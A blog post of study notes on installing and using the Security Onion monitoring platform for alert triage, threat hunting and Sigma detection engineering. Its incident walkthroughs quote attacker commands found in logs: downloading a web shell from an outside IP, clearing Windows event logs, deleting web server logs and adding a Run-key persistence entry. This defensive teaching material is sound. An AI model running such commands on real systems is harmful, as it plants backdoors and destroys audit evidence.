Wednesday, 25 August 2021

Security onion

 

Platform

  • OS: CentOS / Ubuntu (using docker)
  • Infra: Salt, Docker, Elasticsearch, Redis, Logstash, File beat, Grafana
  • Network and host data: Wazuh, Osquery, Beats, Steno, Suricata, Zeek, Strelka
  • Analyst tools: SOC, Hunt, Kibana, TheHive, CyberChef, Playbook, Fleet,  Navigator


Install modes

  • Forensic analysis (import note) (after the fact)
  • Analyst workstation (expanding malware inside a VM)
  • Test (evaluation) just for testing
  • Production
  • Standalone - small environments
  • Distributed - recommended, sec onion grid with roles split up onto different servers


Where to get help

  • securityonion.net/help
  • docs.securityonion.net FAQ
  • Forum (github discussions)
  • Paid support available

Install

  • Download the ISO from https://securityonionsolutions.com/software
  • The ISO is on github
  • ISO is 7GB
  • Verify your image
  • The ISO image is the quickest and easiest method (Installs centos 7)
  • Its possible to also do a git clone on your CentOS/Ubuntu server
Min spec
12GB
4 CPU

Standalone min spec
16 GB 
4 CPU
200GB (or more) SSD recommend

Virtual box used for testing
Installing in virtual box I pick linux -> other 64bit

You would want more in a production environment 

Security onion offer appliances

Storage

  • Local storage is support
  • Remote/Network storage may work but not supported

NIC (Intel preferably)

  • One for network / management
  • One for sniffing of traffic
  • Wireless interfaces not support but may work

UPS

  • UPS is recommended because SecOnion uses various databases which don't like power outages.

Server/Appliance terms

  • Standalone everything on one server. Can be taxing for larger environments 
  • Manager node stores the logs and runs all the reports
  • Search nodes can be used to parse and index events
ISO install
The ISO will ask you for a user, this is for the underlying OS
After install you will be asked to reboot
After login so setup will start
Chose mode type
  • Standalone - all components on a single system
  • Distributed - components split across nodes, for larger networks
  • Import - for importing pcap and logfiles
  • Other - other types
You have to agree to elastic license.

Standard - the manager has internet access (most installs)
airgap - manger does not have internet access 

Select MGMT NIC
Recommended to use static IP eg 192.168.80.45/24
Setup asks for direct internet or proxy. (Direct for most installed)

Select the monitor NIC.
This will be connected to a SPAN port or network tab

Set updates for the CentOS (automatic recommended)

Enter the home network (HOME_NET) you'll want to see your inside networks here.

Enable all components to be installed

Keep docker default IP range

Enter email username and password for the web interface

Select to access web interface by IP
If you use hostname you need to have it resolving in DNS or /etc/hosts

Config NTP

Yes allow so-allow. Can fill in a host IP or range 192.168.80.0/24

Checking after reboot or
sudo so-status (wait a few minutes for everything to start up and have a status of "OK")

Extra agents
You can install extra agents to get more info from the hosts. However this is 3 more agents to install/config and maintain. The installers can be downloaded from the seconion web interface

Sysmon / winlogbeat
Download MSI's from SecOnion web interface
Download sysmon from microsoft 
Download sysmon config from github (swiftsecurity)

run so-allow on seconion (runs on port 5044)
config network beats are to come from

install sysmon with config on the target host(s)
install winlogbeats on host
config file = C:\ProgramData\Elastic\Beats\winlogbeat\winlogbeat.yml
There is an example file 

config winlogbeats to forward events to seconion server
start the service "winlogbeat"
Winlogbeat ships Windows event logs to Elasticsearch or Logstash
C:\Program Files\Elastic\Beats\7.15.2\winlogbeat\winlogbeat.exe"

start mspaint
check eventvwr 
applications + services logs -> Microsoft -> Windows -> Sysmon Operational

This event should have been forwarded to seconion. Wait a few minutes and check the web interface. Go to hunt -> * | groupby event.module event.dataset

wazuh (HIDS)
so-allow -> w
sudo so-wazuh-agent-manage 
add agent
extract auth key
Install MSI on target host
Tick to launch config
Fill in manager IP 10.4.9.90
Fill in auth key
start service from services.msc

osquery
so-allow -> o
[a] - Analyst - 80/tcp, 443/tcp
[b] - Logstash Beat - 5044/tcp
[e] - Elasticsearch REST API - 9200/tcp
[f] - Strelka frontend - 57314/tcp
[o] - Osquery endpoint - 8090/tcp
[s] - Syslog device - 514/tcp/udp
[w] - Wazuh agent - 1514/tcp/udp
[p] - Wazuh API - 55000/tcp
[r] - Wazuh registration service - 1515/tcp

fill in network or host

Install MSI on target host, it should automatically install

Ensure service is started
LauncherSoLauncherSvc
C:\Program Files\Kolide\Launcher-so-launcher\bin\launcher.exe"

You can check the config file
"C:\Program Files\Kolide\Launcher-so-launcher\conf\launcher.flags"
hostname should be mananger server 10.x.x.x:8090


Analyst tools

Remember so-status to make sure everything is up and working
sudo so-test (download PCAPs and replays them in the system, needs internet access)
Log into the web interface 
Login with email address configured during setup
  • Alerts - Review alerts the system has detected
  • Hunt - Look for threats, looks for things they may not have triggered an alert.
  • PCAP - For pcap imports
  • Sensors - All the sensors connected to the management server
  • Downloads - Packages for beats/endpoint agents
  • Administration - admin of the system
  • Kibana - Visualisation of elastic data with dashboards/categories
  • Grafana - Visualise the performance of the system
  • Cyberchef - useful tools during investigations
  • Playbook - build detection playbooks for when something new appears
  • Fleet - Web interface for OSquery (servers and clients details)
  • The Hive - Case management (alerts can be escalated into a case in the hive)
  • Navigator - Visualise coverage from attack frame work
Alert triage and case creation

Start on the alerts interface
On a regular basis an analyst should be looking at these alerts.
The idea here is that they will work on the queue each day and try to get it down to 0.
They can open cases for other teams to resolve issues.
They will need to figure out if its something that needs to be escalated or something that can be acknowledged/dismissed.
This is a task on its own.
It can be sorted by high severity

One for example "Dropbox client broadcasting" this could be a legitimate host that is actually using dropbox. When you drilldown and check the IPs then you can click the bell icon to make it go away but it will come back. You can tune the system to ignore that rule. Similar ones are skype.

Once we have tuned out common apps we can look for real threats.

If we see "checkin" that suggest the malware is on a PC and its trying to contact a CnC server. We can drill down into this event. Here we can get more info like source/destination IP.

You can click on show PCAP for this event which wil show us the PCAP of this event.
Blue is from our source client
Red is the destination server

Endpoint is posting binary data to some suspicious URL like malware.web

Now we can look into our source client and see if there are other others.
Click source IP and click "empty" magnifying glass to see all alerts for this host
We can see an EXE was downloaded

From the Header we "MZ" "PE" and "This program cannot be run in DOS mode." this lets us know this is a windows executable.

We could download it as a PCAP
Open in network miner and generate a hash for the file
Check virus total for that hash which might identify the virus

Zeek is running so we can check that for file events for that external IP. Click the target to go to the hunt interface

It will be common for you to move from alerts interface to hunt interface.
Lets look at the zeek file log
Zeek has analyzer the file and we can see
hash.md5
hash.sha1 left click and go to VT (virus total)
We can see the file was detected by 50/70 scanners

We are pretty sure this is malware. We need to make a case in the hive now. We do this because we want to store all the info in one place. We may need to hand over to another shift or another team to do the clean up. 
Click on the blue escalate icon on the download event
Do the same on the checkin event
Any other events you want 

Go to the hive
Each event will have its own case
We can merge all the events into one case to keep them together
We can attach observables like the hash, exe, URL, source and destination IP
Tick that its an IOC
We can add tasks:
  • investigate other alerts from the compromised hosts
  • get someone to clean the infected hosts
  • block the CnC IP on your firewall
  • look for other connections to the CnC IP (find other infected hosts)
AD Hoc Hunting
Instead of looking at alerts, we will ask/answer questions.

For example, looking at all of the HTTP traffic seen, what destination ports were used ? We would expect port 80 and port 443 for HTTPS. However if we see some traffic using strange ports like 66666 we want to know about that traffic and start looking into it. Is it legitimate or not ? 

Other things to hunt for
  • Checking HTTP status codes and messages. Are we seeing any non-standard results. For example we expect code 200 message OK. What if we see code 200 message lol
  • User agents seen on the network. We would expect mostly the companies browser but there could be other user agents some could be legit others not.
  • Searching for linux commands like dig curl nc being used on windows hosts
  • Filter on traffic that was allowed to pass through the firewall (can group by source IP, destination IP)
  • Looking at port 22 (SSH) often used to tunnel in. Most orgs would have legitimate SSH traffic that would need to be excluded
  • Checking the number of alerts over time. If we see a spike in alerts for example normally we get about 50 alerts but then one day we 150 in a short period of time. This should trigger an investigation. What caused those alerts, where did it come from etc.

OQL (onion query language) used for searching the data
event.dataset: alert | groupby event.module event.severity_label

Events will be listed at the bottom. Each event call be drilled down into

If we click the drop down arrow on the OQL bar there are many pre-defined queries setup for us.
event.dataset: http | groupby destination.port

Now we can see most stuff is going over 80/433. 
We might see some on port 8080 a common alterative port
Left click one of the strange ports and click "plus" magnifying glass

Our OQL changes to this
event.dataset: http AND destination.port:"8008" | groupby destination.port

Looking at this event
We see a strange host 4hhg.56hdshfjds.rocks (left click VT)
Sometimes the URL looks bad but its actually fine
Malware domains might be new and change a lot.

The analyst was able to recognise base64 with the padding "==" on the end
They took this string into cyber chef
From base64 
We got an output but it didn't make much sense
Magic operation tries to figure out the string
Intensive mode will try brute force it which can take time / impact the system
Scroll through and see if we can find anything recognisable 
Doing this we spotted some public IP addresses.

Network.community ID is a hash of the 
  • Source IP
  • Source port
  • Dest IP
  • Destination port
  • Potocol
We can search for that community ID 

Click the network.community_ID and click the "clear" mag glass

OQL
"1:aasjklfhalksfhkjha" | groupby event.dataset event.module 

We can see some stuff from Zeek and Sysmon. (need agent installed)
The network community ID makes it easy to corelate between different log sources.
Hover sysmon
We can see the PC is ran on
The process that was run
The user that ran it
You can google search the process and VT search too

In this case windows defender was downloading a file from the internet. We are not sure if it was legitimate or not.

Parent command line can be useful to look at often bad stuff will be launched from a wscript or powershell.

We can look in Fleet (web management interface for OSquery)
OSquery lets you query the system like an SQL style language
SELECT * FROM users;
Maybe you see a user that shouldn't be on this system or a strange new user.
Checking the machine for auto starting software is a good place to start
SELECT * FROM startup_items;
Also services and scheduled tasks
SELECT name,action from scheduled_tasks;
You can filter for mpcmd looking for that CLI

This is an example of how ad-hoc hunting can help
  • We looked at outbound http traffic
  • Looked at outlyers
  • Drill down into port 8008
  • This lead to a PCAP where we found public IP's
  • We used community ID which lead to sysmon log
  • We found the process that created that network connection
  • We queried fleet (osquery) to find where this is being run from
  • We found on the machine where that process is starting up
  • We should create a case in the hive
Sometimes you will find legitimate software like old servers/services that haven't been shut down but still good for the business to clean these up before they cause a security issue

Detection engineering
  • Detection gap - understanding where we are not monitoring
  • Configure Detection pipeline - Setup new sensor, install osquery, configured logs
  • Write/Test detection - Creating your own detection rules
  • Production and tuning - Enabling the rule in production, usually will required tuning

Detection playbook
  • Objective - Useful info for later and other teams
  • Machine query - Can be zeek script, playbook, sigma signature etc
  • Next steps - What do we do after detection, how do we fix it
Playbook has lots of plays already created for you.
You can go in and view the play
View ElastAlert Config 
View Sigma 

Next steps examples could be lock down permissions on the share and contact system owner.

Sigma is an open signature format. Can be applied to any type of log file. The idea is to make it easy for sec works to easily write and share signatures
snort/surricata rules for network ids
yara rules for files
Sigma rules are for logs
Sigma is yaml

For example we can look for windows accounts being created. Not something bad on its own but we might find attackers are creating their own users. Windows Event log ID 4720. Does the username follow our company policy naming convention.

Click Convert to change it to an SO elasticsearch query.
Click copy
Go to the hunt tab and paste the query and make sure we are getting results
Edit play as needed
Now we have tested its working we can "create play from sigma"

Edit the play
Change the status from "Draft" to "Active"
Now the its in production and will be looking for those logs

When the play generates an alert it will appear in the Alerts tab. The source will be from playbook. If one pop's up that we don't recognise we can see the play details and read the objective of the play. If we create a case in the the hive we can see tasks already setup from out play. This is good because we go from detection to next steps and we have context of why the alert popped and why its important to fix.

Security Onion 2
Security onion 2 released OCT 2020
You want to monitor north/south directly behind the firewall. Traffic that is going in/out from the internet.
East/west traffice from client DMZ <-> Servers
SO also likes to collect windows logs from the servers and clients

NIDS alerts from Surricata (Starts and investigation)
Protocol metadata from Zeek (Provides context)
Full PCAP from Google Stenographer (high performance/indexing)

Sniffing NICs
Collect the raw data AF_PACKET (built into linux kernel by default)
AF_PACKET kernel based load balancer.
The purpose of an AF_PACKET socket is to allow network communication at the link layer, for example to receive or transmit raw Ethernet frames.
Consuming from AF_PACKET is Stenographer / Surricata / Zeek
They write their data to several locations
  • Stenographer -> Full packet capture -> /nsm/pcap -> sensoroni agent
  • Surricata -> IDS alerts -> /nsm/suricata -> Filebeat
  • Zeek -> Protocol Meta data -> /nsm/zeek/logs -> Filebeat
  • Zeek also extracts files like EXE, PDF -> /nsm/zeek/extracted/complete/
  • Those files are then analysed by Strelka
Strelka is a real-time, container-based file scanning system used for threat hunting, threat detection, and incident response.

FileBeats is the platform for lightweight shippers to push data from your servers to the Elastic Stack. We can have a filebeat for mac or windows etc. So windows logs are shipped into your SO Elasticsearch/logstash

Endpoint visibility
OSquery - cross platform way to collect logs from clients. We can also query endpoints with and SQL based language  
Elastic beats - Alternative to OSquery. winlog beast, filebeat, auditbeat etc.
Wazuh HIDS - Host based intrusion detection system. Also cross platform for log collection. root kit detection etc.
Sysmon - sysinternals gives great logging for windows. These will be pulled off the endpoint with one of the agents above
autoruns - sysinternal tool also give great information
There are some options here and the enterprise can choose what works for them

SOC (security onion console)
New management interface
One stop shop to access all of the interfaces

Alerts interface
Any IDS when we set it up we get lots of alerts. Too many. How can we slice and dice the data. SOC has created a simple but powerful interface.
Sec analyst should work on the alerts queue and try get it down to 0 each day. Weed out false positives, normal stuff, investigate suspicious stuff and open cases for confirmed malware infections etc.
Pivot from alert -> full pcap
Pivot from alert -> hunting interface
Alert interface is not just 
  • Surricata alerts (NIDS)
  • Zeek alerts (file / dns etc)
  • HIDS alerts (wazuh)
  • Yarra file matches (Strelka)
  • Playbook matches (Sigma sigs and you own custom detection playbooks)

Hunt interface
Asking questions getting answers
Looking for outliers
Think like an attacker, what would they be trying to do
Crown jewels approach. Our most important data is on server A in database X so lets look at traffic and processes to/from this server/database.
Ransomware often looks to encrypt fileshares, lets look at activity on those.
Pivoting to full PCAP, virtus total etc

Kibana dashboards - visualising data
CyberChef - Tools for encoding/decoding 
Playbook - Pull rules from the sigma community, convert them to run on an elastic search backend. Moving threat hunting into an automated process. We might find a threat on one customer, create detection remediation and copy/paste that play.
Fleet - Web interface for OSquery
The hive - case management tool, all interfaces can escalate and create a case in the hive (blue triangle)
Attack Navigator - MITRE frame work. This is the idea of trying to follow attackers tactics
Grafana - Monitor health of deployment

Analyst workstation
If you are extracting malware reverse engineering some software you will want to do that inside a VM
You want to run it inside an analyst workstation 
Gives you the usual tools

Community power
  • Emerging threats NIDS rules
  • Wazuh HID rules
  • Sigma rules
  • Yara rules  / Strelka
  • Elastic common schema  (ECS) other tools can work with this
  • Community ID for correlation
Searching for the community ID value will help you find other alerts/logs from other sources. Can help you find stuff.

Search osquyery for that community id and it can return the process that generated that network traffic.

Sysmon is free but its not open source. Community id has been requested but has not been added yet. OS has sponsored a way to dynamically generate the community id value. Now you can correlate all of your logs together.

Use cases
Smallest forensics VM, import pcaps 
Production deployment. Start with a standalone deployment on a server. Everything working on one server. Will work ok in smaller enviornment
You will probably want to scale to production deployment - distributed 
Central server / manager
One or more forward nodes - sensors forward all the logs to the manager which stores them in search nodes
One or more search nodes - search on the data

As we move from forensics VM -> standalone -> distributed the resource requirements go up. 

Raw PCAP -> Forward Nodes (osquery/strelka/surricata/wazuh/zeek) -> Filebeat -> Forward logs -> Manager (logstash -> redis -> elastic search) -> Search nodes (logstash -> elasticsearch <-> Currator)

This design is scalable because if we want to add more network visibility we can add more forward nodes. If we are getting slow searches we add another search node.

Snort support
Looking at adding snort later when the 3.0 is released

RHEL 7 support
Working on support for that in the future

MSP
No MSP style manager yet
Looking at adding redundancy for managers but longer term pipeline
At the moment the customer should create their own grid and admin it from there.

Analyst desktop
so-analyst-install
Install so 2 in a VM (analyst install) 
No sniffing
No elastic search
Just PCAP tools

You can do a full standalone 
after setup is completed install so-analyst-install

You could also do Centos minimal install 
git clone the script

Wazuh
Every nodes runs a wazuh manager
Wazuh api
Rules

Can I point firewall syslog (or other device) to the manager
This is possible. You can send it to forward node or manager

AWS
SO 2 AMI will be on the market place


Alert Triage & Case Creation

We assume security onion has been installed correctly.
HOME/EXT_NET variables have been configured

Alerts tab check the alerts for the last 24 hours
Bell icon acknowledges alerts (makes it go away)
The blue triangle escalates it. This opens a case in the hive.

Left click on the alert name and drilldown
Click the arrow to expand details
Check the source/destination IP's
Get info on your servers
Look at rule.rule
Look at the network data decoded

We can left click on attacker public IP and click only to see all events for that IP

If we esclate that will create a case in the hive
In the hive we can see the case is created, we can add extra info in here
Go into the observables and add the IP's we found along the way
The give will compare observables between cases and we might spot something else

Security event log cleared coming from playbook
Looks bad someone was clearing out logs

Commands completed surricata
left click network data decoded -> actions -> pcap 


Left click the attacker ip -> actions -> hunt
This will bring us to the hunt interface

We might find a webshell.php add it as a file on the observables in the hive

If we have a web shell we want to know where it came from and what it did.
Looking at the network logs/pcaps 

Go to pcap interface
select sensor name
source/destination IP 
Anything that was exchanged on that day
this will generate  a pcap of all the traffic between the attacker and the webshell server
attacker ran "wevtutil cl Security" to clear the security logs
We may also see "wevtutil cl Application"
Deletion of the web server logs "del /f /q c:\xampp3\apache\logs\*"

What if the traffic was over port 443
Playbook uses sigma rules (vendor agnostic rules) to look for attacks
event_data.message
event_data.winlog.event_id 1102 (log cleared)
need windows event log forwarding

Can click on the username  -> hunt
click on process create -> include
process.command_line -> group by
group @timestamp


How did the web shell get on there.
Hunt interface query
"webshell.php" | groupby @timestamp event.module event.dataset
We may see
powershell event
zeek
surricata

Looking at powershell event 
winlog.event_data.ScriptBlockText
Invoke-WebRequest -Url "http://100.200.7.7:/webshell.php" -Outfile C:\xampp3\htdocs\webshell.php"
This is like a wget to download the php script
Next step would to be see the user
winlog.user.name 
left click user "bob" and include
remove "webshell.php" because we want to see everything bob did
Open an event with the arrow > click the script block text layers so it shows as a group field 

We can look for the attacker IP where the script came from 100.200.7.7
We can add the hash to the hive

From the hunt page
left click -> hash.md5 -> actions -> pcap
We can get the full pcap of that file so we can look at it and see what it does
In this case the webshell was a standard on available in github

In the hive we can add tasks for teams

web team clean up webshell.php
server team remove attacker account
server team reset bob user password and check devices
server team remove RDP access via the internet install MFA etc.

When we close the case the observables will still be compared in the hive.

Ad hoc hunting
Not all malicious activity will generate alerts
When hunting we need to ask questions, find the answers all the time looking for suspicious activity

Hunt interface has the OQL (onion query language)
Work off last 24-48 hours

The down arrow has lots of predefined queries.
groupby event.module event.dataset
windows_eventlog (windows logs to be forwarded to security onion)
zeek logs
ossec (wazuh agent to be installed) 
sysmon (service to be installed)
osquery (agent to be installed)

Left click -> include on zeek 
include on ssl traffic
SSL is encrypted 
(In options you can disable the automatic update group by)
Expand an event and click the layers to add group-by fields
Remove event.module and event.dataset

Now you can see SSL traffic
Most HTTPS/SSL traffic should be on port 443
You can exclude 443 to see if there is anything running on other ports
You can look into this, is it normal

ssl.validation_status is good to look at
We might see certificate has expired
We could find self signed certificates

Looking at the count and ssl.server name 
you can see what servers are being visited alot
You will see a lot of Microsoft and CDN
You could exclude microsoft.com

Often we see shell scripts run from free public hosting sites like
github, pastebin, dropbox, googledrive, onedrive etc

Hunt for ssl.server_name: *.githubusercontent.com
Left click source IP and click -> group by

Once you find a strange event left click -> actions -> correlate 
This will show all related events
Check the conn log
Correlate again on the network.communit_id

You may find a process
On the process GUID you can left click -> only on the GUID

Arrange your timestamps on earliest.
We can see the process does a DNS query for malware.net
We can do a query on virus total for that
From there it looks like a crypto miner
We can see other related URLs / exes etc

You can make a timeline with 3 lines:
Alerts
Network
Host

Fill in all the information you have 

We see that malwareS.64.exe started and launched nslookup.exe with process injection. The attacker used the legitimate nslookup process to launch their own process hidden inside. 

We can see it connecting to xmr.2miners.com
We can use the parent process value to traceback where it came from
Tracing it back you can see the user downloaded a bad .exe file and ran that.
That .exe file launched the malware.

Looking at the command line of the processes we can see the malware adding itsself as a service so it starts up with the PC
cmd /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "malwareS64" /t REG_SZ /F /D "C:\users\bob\AppDataLocal\Temp\malwareS64.exe"

We see the parent process was explorer.exe and the hash for this checks out so this confirms the user launched it from windows as normal.

Normally we will see a dropper process which goes out to get the malware, then it will install persistence and finally check in with CnC servers. In this case it was a crypto miner which would just use computer resources and probably not do anything bad like ransomware.

Now we have to follow on tasks to clean up and remediate and follow on hunts.
Can we build automatic detections
We have IP's / file hash's that we can check the rest of our org
Keep in mind hash's and IP's are easy to change
nslookup is generally used by IT staff, not by normal users, we could alert when normal users are trying nslookup

Spotting crypto miners
We might see --algo for example

Network outliers TCP/4444
ComandLine stacking. Looking for process injection.
Startup tasks - many things add startup files. You might not want to alert on it but you may want to hunt on it.
Should the user bob have rights to download and install.exe files

The takeaway is when we find a suspicious event we need to think about what happened before and what happened after and try to build a timeline and figure out what happened.

Detection Engineering
Detection engineering starts when we realise we have a gap in our detection. This could be when we are starting out with nothing or when we have an incident where a user downloaded malware and we found out later.

Detection gap -> identify and config data source -> Write + Test detection -> Deploy to production and tuning

Lets say we want to know about google workspace
We can see google workspace provides an audit log

Setup a service account in google workspace
Config security onion
Config elastic filebeat (has modules for lots of datasources)

Download the .json file from google
Remove the other scopes from the service account
We only need read only reports.audit scope

In security onion manger on CLI
Copy that .json file to the manger

*note* do some research on salt, pillar and minion

vi /opt/so/saltstack/local/pillar/minions/so-manager_standalone.sls

appened to the end the config for the filebeat moduile
filebeat:
we specify the path to the .json file
the account
the interval

These are yaml files so the spaces are spaces not tabs

Restart the service
so-filebeat-restart

Check the logs
tail -f /opt/so-log/filebeat/filebeat.log

*note* In GUI -> cheat sheet the important files and logs are listed there.

Query elasticsearch for google workspace
so-elasticsearch-query _cat/indices | grep google_workspace
We should see some indices with some logs

*Note* you may see a "!" on grid because you restarted filebeat recently it will go away on its own

Go into hunt interface and look for logs from google_workspace

We can see event.action is the data we are looking for. Now we've got the data into security onion we need to create a dection.

In google workspace lets add a user to an admin group. That will generate an event and we want to make a detection off that.

googl_workspace.admin_rule

Go to playbook
Change plays from draft to active to turn them on
Plays are made from sigma rules
Sigma rules are written in yaml
Sigma rule are vendor independent 


title: google work space - user granted admin ruile
status: experimental
description: detects when an admin role is added to a user
author: SOS
logsource:
 product: google_workspace
 service: admin
detection:
 selection:
  event.dataset: google_workspace.admin
  event.action: ASSIGN_ROLE
  google_workspace.admin.role.name|contains: admin
condition: all of them
falseposittives: legit user-add
fields: user.target.email
level:high

Drop that ino playbook. that will convert the sigma into the SO elasticsearch query. You can copy and paste that into the hunt CLI to see if its work. Once you are happy with it you can make the play.

Edit and change the status from draft to active

Now when we add an user to an admin role it should create an alert

By default elastic alert is running every 3 minutes so you might have to wait a little while to get data from your new active play generating alerts in the SO interface.


Setting up Sysmon

Setup the manager
ssh to the manager
sudo so-allow
b for logstash beat
enter ip address or range where the clients will come from

Install sysmon on the client(s)
Sysmon records important events to the windows event log
Download and install sysmon on the windows client. It installs a service.
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

Sysmon can be very chatty you can config this
There is a swift on security config file which you can use as a good starting point

sysmon -i sysmon-config.xml

Install winlogbeat
Winlogbeat sends the windows event logs (which contain the sysmon logs) to security onion
In your manager go to the downloads section on the left.
Like sysmon it needs some config too.
Output will go to the manager IP on 50

Install and check the box to the winlog config directory
You will want a config .yaml file

Open up services
Look for elastic winlogbeat oss service and restart it

Now you can open mspaint.exe
Look in events logs in eventvwr
windows logs -> application -> microsoft -> windows -> sysmon -> operational
You should see the log for mspaint being launched.


Gothchas
If the /nsm fills up to 90% the pcap's will be stopped. Security onion gives 200 gig as minimum but looks like in reality you need a lot more.
location of file to config HOME_NET opt/so/saltstack/local/pillar/global.sls

HOME_NET is hnmanager
global:
     soversion: 2.3.90
     hnmanager: '10.4.9.0/24,10.4.10.0/24'

EXTERNAL_NET can be added like so
suricata:
  config:
    vars:
      address-groups:
        EXTERNAL_NET: "!$HOME_NET"

Sensor files are in here:
opt/so/saltstack/local/pillar/minions/




No comments:

Post a Comment